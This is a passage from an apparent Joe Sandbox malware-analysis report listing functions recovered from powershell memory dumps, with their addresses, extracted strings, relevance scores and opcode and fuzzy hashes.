(f}l, xrefs: 06EC8CFA

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: (f}l$(f}l
API String ID: 0-4163203244
Opcode ID: 76b9a173b9ef2586789d8a09442b30f6641309d43c1e3301dc0802f11a30721a
Instruction ID: 933490b3584dd5fa009786a517de419a589e5ee417380a185b4d37e30ec1ea0c
Opcode Fuzzy Hash: 76b9a173b9ef2586789d8a09442b30f6641309d43c1e3301dc0802f11a30721a
Instruction Fuzzy Hash: B3917D70B002049FDB54DF98C741EAABBF2AF89324F159169D805AF355CB72ED42CBA1

Function 08B30048 Relevance: 2.7, Strings: 2, Instructions: 236COMMON

Download Yara Rule

Strings

(f}l, xrefs: 08B30219
(f}l, xrefs: 08B30223

Memory Dump Source

Source File: 00000001.00000002.2156268646.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8b30000_powershell.jbxd

Similarity

API ID:
String ID: (f}l$(f}l
API String ID: 0-4163203244
Opcode ID: 2647243bcedc63e0953599eac635fed7f1c289b860f0ef559950abdc798a1fca
Instruction ID: 869cda2fc9979c6368aac83381ac0f7e53e1ad438bfefac6a67305d1f43f8a1c
Opcode Fuzzy Hash: 2647243bcedc63e0953599eac635fed7f1c289b860f0ef559950abdc798a1fca
Instruction Fuzzy Hash: 48915D74A00614DFCB14DF98C555AAEBBF2EF88715F15C0A9E805AB355CB32EC42CBA1

Function 06EC4F91 Relevance: 2.6, Strings: 2, Instructions: 60COMMON

Download Yara Rule

Strings

$^q, xrefs: 06EC5027
$^q, xrefs: 06EC5003

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: ed596a0421ac79f7796e3c80d05a8dfcd2569489bdb5c59187bf89033f3b1c87
Instruction ID: 5071e1cbdffba1bebee37e86fe6a5cb4110e25b0c23bdb98a6ec7afb6fed8aab
Opcode Fuzzy Hash: ed596a0421ac79f7796e3c80d05a8dfcd2569489bdb5c59187bf89033f3b1c87
Instruction Fuzzy Hash: 49110B31D04345CFD7618F1886119AABBF0AF85278F1950AFD454DB242E731E556C7E2

Function 06EC8BA5 Relevance: 1.5, Strings: 1, Instructions: 218COMMON

Download Yara Rule

Strings

(f}l, xrefs: 06EC8CFA

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: (f}l
API String ID: 0-3591226775
Opcode ID: ced46dd9fed7edeb1e07eb9f92031bb7df445465265ba92bf341a11b82e6c4d8
Instruction ID: d10bac81a903c95c7dfff9fa890aa050266469df56368bc87690ebd42699367a
Opcode Fuzzy Hash: ced46dd9fed7edeb1e07eb9f92031bb7df445465265ba92bf341a11b82e6c4d8
Instruction Fuzzy Hash: 28914C70A00304DFDB54CF58CA41EAABBB2BF89328F15916DD9056B351C772ED46CBA1

Function 06EC8440 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

x.nk, xrefs: 06EC84F2

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: x.nk
API String ID: 0-2617426556
Opcode ID: e40b2878f5082d6abf8802cd7ce04183f570acbf3e7180ea13b4c5222509e9cf
Instruction ID: dbe06632ff07133142c3ad3b1170a3d8e0af4899d3af262926f74fc5798e6597
Opcode Fuzzy Hash: e40b2878f5082d6abf8802cd7ce04183f570acbf3e7180ea13b4c5222509e9cf
Instruction Fuzzy Hash: F431C570B40204AFD7149B69CA51FAF7AA3EF84314F158418E9066F395CEB2EC468BE1

Function 06ECFAE0 Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06ECFBF2

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: a4b8e66409a2cee7b358e3bc765857caccebe02c802b3c71eceb5be3ec56d303
Instruction ID: 9a815240ec11314878a7feb560e0bedeb7cdcf445865e6e5e5a1fafdd2439069
Opcode Fuzzy Hash: a4b8e66409a2cee7b358e3bc765857caccebe02c802b3c71eceb5be3ec56d303
Instruction Fuzzy Hash: 05212131F00305CFDFA85A248761BBE7AA39F80264F18506DCC01DF299DB39E982C7A1

Function 08B11120 Relevance: .4, Instructions: 440COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 556ddaa967629079861c24457f71388587429f30dbb0764e959147a15d2b17ec
Instruction ID: 7f24ae024f4c328043a7a9489e913ac369e32d03ef03479a3576a513175688dc
Opcode Fuzzy Hash: 556ddaa967629079861c24457f71388587429f30dbb0764e959147a15d2b17ec
Instruction Fuzzy Hash: C9021774A012099FCF05CF9CD984A9EBBB2FF88310F658199E905AB365D731ED81CB90

Function 08B116E8 Relevance: .4, Instructions: 425COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79082e22535b53df22ca179407ee747b5eb84743717b3aff2216bbfc70585434
Instruction ID: 6f040399783120ae5c6b29b13594b35ec9acf855f47ff871d9bcede2a51781a2
Opcode Fuzzy Hash: 79082e22535b53df22ca179407ee747b5eb84743717b3aff2216bbfc70585434
Instruction Fuzzy Hash: 67021A74A002499FCB05CF9CD584AAEBBB2FF49310F658199E905AB365C731ED86CB90

Function 08B120C0 Relevance: .4, Instructions: 424COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31966be805a33ca17ad64cc535bf428e40d91343f0a769c5677786838a7fc270
Instruction ID: a33986aa3d0b62c3f5dbba7f3f6ea4f0297beba6614c1a363fb6fc137ac49734
Opcode Fuzzy Hash: 31966be805a33ca17ad64cc535bf428e40d91343f0a769c5677786838a7fc270
Instruction Fuzzy Hash: 02020B75A00209DFCF05CF98D594AAEBBB2FF88310F658199E815AB365C731ED81CB90

Function 08B10800 Relevance: .3, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16edbf35892840d1b655629b1181bd5fcccdceec020b1c3a99efd2f735b03824
Instruction ID: 9ba97f3d0bfa82224e8d311d0aefa781881a6b835ab3b02b1675e3271720379e
Opcode Fuzzy Hash: 16edbf35892840d1b655629b1181bd5fcccdceec020b1c3a99efd2f735b03824
Instruction Fuzzy Hash: 1FE10A74A00609DFDB05DF98D594AAEFBB2FF48310F648199E805AB365C731ED86CB90

Function 043072A8 Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4300000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f088c1947f53fadb9da8013dc1af7d4c0da7d93023977738f608741d0f31b0e
Instruction ID: 8a265ab8d9028fb2c957e9ab24022f1f13837ebfaccdcfa1782286e7a31e6179
Opcode Fuzzy Hash: 9f088c1947f53fadb9da8013dc1af7d4c0da7d93023977738f608741d0f31b0e
Instruction Fuzzy Hash: 01C1BF35A002089FDB15DFA8D954AADBBF2FF84714F158659E4069B3A4DB34FC4ACB80

Function 08B10448 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2ebdb4f9d7048d7ff195996aaa2b90ef10aeb0022f6176d38e67b5f634e9cbf
Instruction ID: 637e27cc8887d33b3a0ac20701adba93d3069f2246234a9a042c3e5083319706
Opcode Fuzzy Hash: b2ebdb4f9d7048d7ff195996aaa2b90ef10aeb0022f6176d38e67b5f634e9cbf
Instruction Fuzzy Hash: 17817F30B006058FCB14DFA9D980AAEBBF6FF88304F548569D4059B365DB34ED46CBA1

Function 04307A70 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4300000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b2bfb4f409408b16c9c0420f1677e2c91446a1e83e862c887ea42d3585720d1
Instruction ID: 35f357e5612b93913fbe28f55e98369dd571d9d0b45aca433ffd6ea1ca508918
Opcode Fuzzy Hash: 6b2bfb4f409408b16c9c0420f1677e2c91446a1e83e862c887ea42d3585720d1
Instruction Fuzzy Hash: 6D718B30A012098FCB14DF68C890A9DBBF6FF85314F14CA6AE415DB6A1DB75BC46CB90

Function 04307BDE Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4300000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaab2206c3188f0c55dd1d0a529faeb65eef24cbd204a39c27f232bac6855534
Instruction ID: a424404f39cad1bc58b45a8630f1c3d45ddae3eb9c43770495302008bf3d0e56
Opcode Fuzzy Hash: aaab2206c3188f0c55dd1d0a529faeb65eef24cbd204a39c27f232bac6855534
Instruction Fuzzy Hash: E3714A70E002089FDB14DFA5D994BADBBF6BF88304F148569E412AB7A0DB35BD46CB50

Function 04302BC0 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4300000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3c1eae1f797b58c62c417d65d75643546bb6b7a58a788a62fea2efa7a88d04d
Instruction ID: dea99895b704297732be892c7316c40b89ad3d1e6b69b1a4ad606cbbdf68f2bc
Opcode Fuzzy Hash: c3c1eae1f797b58c62c417d65d75643546bb6b7a58a788a62fea2efa7a88d04d
Instruction Fuzzy Hash: 8951B0709092858FCB06CF28C4E49AABFB0EF06314B1586D6C8919B2E6C735FC55CBA4

Function 08B110D0 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94d04d8d31e0ee0cceadb9d73a0e7b674e740b799c80e1ee8eb7b70bc39e6f91
Instruction ID: 8669663a5765b1436ab7d278b3828371677e664e40f9d5d0057b5d563f6697f9
Opcode Fuzzy Hash: 94d04d8d31e0ee0cceadb9d73a0e7b674e740b799c80e1ee8eb7b70bc39e6f91
Instruction Fuzzy Hash: 48515E70E052459FCB05CF9CC9909AEBBF2FF49320B25829AD954EB3A5D335AD41CB90

Function 06EC2051 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e25ac3183649a44eaa237a5b89084815efbc806563289f50c6460307a6579605
Instruction ID: 5f266ca50bad9d7273377836d6a47ae078d4722ff442f57d8c4eb77e969ccdae
Opcode Fuzzy Hash: e25ac3183649a44eaa237a5b89084815efbc806563289f50c6460307a6579605
Instruction Fuzzy Hash: 7C414C31E103018FCB554F288B11A697BA6AF85264F09909EDB019F262D735DA47C7A2

Function 06EC87C8 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f885ece211ce609d5c70b346a6ba9ad682693e5d7b70d94c49a6492851a9f12
Instruction ID: f7ce2ad232119cc699b1b7f7c6fc96128d3fefc70aedfbcb0ca06b280dc11e9b
Opcode Fuzzy Hash: 4f885ece211ce609d5c70b346a6ba9ad682693e5d7b70d94c49a6492851a9f12
Instruction Fuzzy Hash: 0A413A32B043058FCB555B788B01AABBFA19F81320F04957ED806DB692DB31D946C7A2

Function 04307801 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4300000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5f29ee0ca5ef467de9abcecf6ab6161095acdafad9b8083ca005587bda12e3
Instruction ID: a13b8c324e14f59a4f0e5070c00eb2e3b64f266056cc7e5b7da552d8c788ba36
Opcode Fuzzy Hash: 4c5f29ee0ca5ef467de9abcecf6ab6161095acdafad9b8083ca005587bda12e3
Instruction Fuzzy Hash: 40418F35B402148FDB15DF74D9646AABBF2EF89350F089569E402EB7A0CF35AC41CB90

Function 08B120B1 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a53790af5def55e6e1c7f44a832ad2d2e1438c244cd3bec50e1a3ea4cdaf64c3
Instruction ID: 8d09ff540b504cc0e33832670980063a6c4248b0c48b569400d492140bcdc061
Opcode Fuzzy Hash: a53790af5def55e6e1c7f44a832ad2d2e1438c244cd3bec50e1a3ea4cdaf64c3
Instruction Fuzzy Hash: AC410874A005198FCB09CF9CC984AAEB7F1FF48311B258269E915EB3A4C735EC51CB90

Function 0430D680 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4300000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3b5f10b9375eabeb60b9879e2cc12e970d178b0f077af2ff5a60b2d158a0171
Instruction ID: 4c3e180302679be720d327ac66cfaf6af4245ad5512775cdf3fd68d2afb581ef
Opcode Fuzzy Hash: f3b5f10b9375eabeb60b9879e2cc12e970d178b0f077af2ff5a60b2d158a0171
Instruction Fuzzy Hash: C9413034B002088FDB08DF79D5947AEBAF7AF88310F18C469D805AB795CE35DC468BA0

Function 04307A5B Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4300000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a62e8eace986e3fe59a8afec7a88b798b32e6a13f077edb8e225dbf264228a8d
Instruction ID: fbf8f03cc3d3b6692b6cef18e7105bced7dda02c4dd4d5eac7322e38d9667df9
Opcode Fuzzy Hash: a62e8eace986e3fe59a8afec7a88b798b32e6a13f077edb8e225dbf264228a8d
Instruction Fuzzy Hash: 76416E70A012088FDB14DFA9C8946ADBBF2BF88304F158969D405AB7A4DB75BC46CB90

Function 08B116D7 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6fe581ee027cb25bc80d7c5a4538dff72303e7b2d7aee67d7e7b4150b50d78f
Instruction ID: e380994536399c56b12d0870251f45bbdc46eaf98c393560eb6b0abeb64c63f6
Opcode Fuzzy Hash: d6fe581ee027cb25bc80d7c5a4538dff72303e7b2d7aee67d7e7b4150b50d78f
Instruction Fuzzy Hash: 9C410774E106099FCB05CF9CC4849AEBBF1FF48311B648659E915AB3A4C735EC52CB90

Function 04302BB9 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4300000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c2d6e3f197f3397c0be3e4b199eca9859888249a22befed2b862a76e612e555
Instruction ID: a8a856923a4e73cc2aa638b538804087ea2d4a4a4e9514f9df07b4c3811e4b16
Opcode Fuzzy Hash: 3c2d6e3f197f3397c0be3e4b199eca9859888249a22befed2b862a76e612e555
Instruction Fuzzy Hash: 424128B4A005058FCB09CF58C5E8AAAF7B1FF48314B118699D815AB3A4C732FC51CFA0

Function 08B107F0 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54b720a67860470c9f5ad660ced78f3d8a5d10639f39adbe4b0da56132c022a1
Instruction ID: 61f53c7c3178f01af41371b7dca70f187ecd5c7307cb57dfdedac99718ef6d59
Opcode Fuzzy Hash: 54b720a67860470c9f5ad660ced78f3d8a5d10639f39adbe4b0da56132c022a1
Instruction Fuzzy Hash: FE310674E00509DFCB14DF99C584AAAFBF2FF88310B248699D459AB755C731EC82CBA0

Function 02A0F520 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2143709737.0000000002A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a0d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1018b91efafb36cffd89d291ef4029de4c642d2480bafcd5de5e20fc0f200168
Instruction ID: 63c4c0aeea1102de5e63e6c569b4d88aa19b19af589ebaec2febbf1a0cacecd0
Opcode Fuzzy Hash: 1018b91efafb36cffd89d291ef4029de4c642d2480bafcd5de5e20fc0f200168
Instruction Fuzzy Hash: AC212475500200DFCF25DF14EAC0B2ABFA1FB88314F24C5A9E9099B696CB36E456CB61

Function 02A0F51B Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2143709737.0000000002A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a0d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
Instruction ID: 808d4369ed9d6d1111fa10d910d46fff0f944627534d2ab5c9062738cc963783
Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
Instruction Fuzzy Hash: 0021AE76504240DFCF26CF10D5C4B16BF71FB44314F24C5A9D9094A656C73AD46ACB91

Function 0430A99B Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4300000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d8e9abdefc26105dc4d678bccbf41481c99311c2be755c94b9c1ea6e51fec7e
Instruction ID: 5e4f1eac26c69b7cffb26db7caf3827f2fde8f5166c188a4c8f6439b9f626446
Opcode Fuzzy Hash: 6d8e9abdefc26105dc4d678bccbf41481c99311c2be755c94b9c1ea6e51fec7e
Instruction Fuzzy Hash: AC01A2B8B402189FCB00DF98D490AADF771FF8D300B208299D55A9B361CA36EC43DB50

Function 02A0D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2143709737.0000000002A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a0d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 464a61ce85433d767049fa270efcf00cd9cb5ec68520a127f288a2806be7f2f8
Instruction ID: d6b1edf7ba35f3fbfcae1bebfefc24d5a40fdfaa31f7d96745c7a78aad29aa9f
Opcode Fuzzy Hash: 464a61ce85433d767049fa270efcf00cd9cb5ec68520a127f288a2806be7f2f8
Instruction Fuzzy Hash: F201F7724097009AE7104F65D9C4F67BFA8DF41324F08C429EC4E5B1C6CB799841C6B1

Function 02A0D006 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2143709737.0000000002A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a0d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 728410f34522d73ef664f969b8e2b813985bc6242b8cbb9a77211655bf7f1739
Instruction ID: 2d3a4cd771ce56985a2fec6e58a33a023f4e3d039cb232326895ba23041d0436
Opcode Fuzzy Hash: 728410f34522d73ef664f969b8e2b813985bc6242b8cbb9a77211655bf7f1739
Instruction Fuzzy Hash: 02014C6240E3C09ED7128B259994B52BFB4EF42224F1880DBD8889F1E3C2699849CB72

Function 08B10427 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef092df309a569925cdb3c02be67d51eea25b4f90ddf224ff8c2d994afe03739
Instruction ID: 4b734adaae64dc2134263c42e535b32312c65e4c290c62a0ed546d9200067722
Opcode Fuzzy Hash: ef092df309a569925cdb3c02be67d51eea25b4f90ddf224ff8c2d994afe03739
Instruction Fuzzy Hash: 09F02831E092455FCB01A769D8449CEBFB5EF42250F4540FBD0448B253DF28180ACBA2

Function 0430F520 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4300000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dd180929b5201552a6c7c1b8a4cde64a8f396d73badfc556125db3851f8dd30
Instruction ID: 223e5f2bc60c87a61a5c0cc229a655d939f01b3e99d9fcde541d14992e4c3b7b
Opcode Fuzzy Hash: 5dd180929b5201552a6c7c1b8a4cde64a8f396d73badfc556125db3851f8dd30
Instruction Fuzzy Hash: C7F090F9301114AFCB066B38E06882E7BA7EFC8622314401AE807C3390CF79DC028B91

Function 06EC0016 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 196cae6f588692c7ad5dbae23db0eede814aa6ac831bff515795b64e11c5d373
Instruction ID: 787466fff4534903a3dcc63a1c135f62bca9d75c1ed4752fb7cbaf933641c133
Opcode Fuzzy Hash: 196cae6f588692c7ad5dbae23db0eede814aa6ac831bff515795b64e11c5d373
Instruction Fuzzy Hash: C8F0E75090E3C19FD7530B785E265A63F754E53254B1A15DBD080CF2E3D81E494ACBB3

Function 08B1279A Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be68b837d4d3b56d9cb701297096a97f05dbfb483dcebaa1f0690ae86ac974c7
Instruction ID: 2ef0951cac060cf23d86b8565fc447c0059de8fcf29f99893e3a653679f94adc
Opcode Fuzzy Hash: be68b837d4d3b56d9cb701297096a97f05dbfb483dcebaa1f0690ae86ac974c7
Instruction Fuzzy Hash: E2F0F935E00109AFCB05DF98D9408ADFBB6FF88320B248559E514A7260C7329D62DB90

Function 04302D35 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4300000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 190d6ae8dcafbe93a7bf20a8ebbb88a687b1944bb016bfe34dc1cea679bbb8fa
Instruction ID: 21bad8ad0047181e03ca7cf76b3973374592eea9167fc359f36f5005a37523f0
Opcode Fuzzy Hash: 190d6ae8dcafbe93a7bf20a8ebbb88a687b1944bb016bfe34dc1cea679bbb8fa
Instruction Fuzzy Hash: 2BF0B4756082848FCB01CB5CD86459CBB70EF4622871981E7C858DB1D3C7366C17C721

Function 0430FDD8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4300000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 04fabe12b87a33afef49cb2da06cb232eb5d9894256b8765f93be06e07f56c14
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: 99D017B0D002099F8780EFACC84156EFBF4EB48200F20C5AE8918E3301F732AA12CBD1

Non-executed Functions

Function 06ECCE28 Relevance: 14.1, Strings: 11, Instructions: 371COMMON

Download Yara Rule

Strings

$^q, xrefs: 06ECD0E6
$^q, xrefs: 06ECD131
$^q, xrefs: 06ECD141
4'^q, xrefs: 06ECCF60
$^q, xrefs: 06ECCF33
4'^q, xrefs: 06ECD16B
$^q, xrefs: 06ECCF23
4'^q, xrefs: 06ECD15F
4'^q, xrefs: 06ECCF54
$^q, xrefs: 06ECCECE
$^q, xrefs: 06ECD256

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
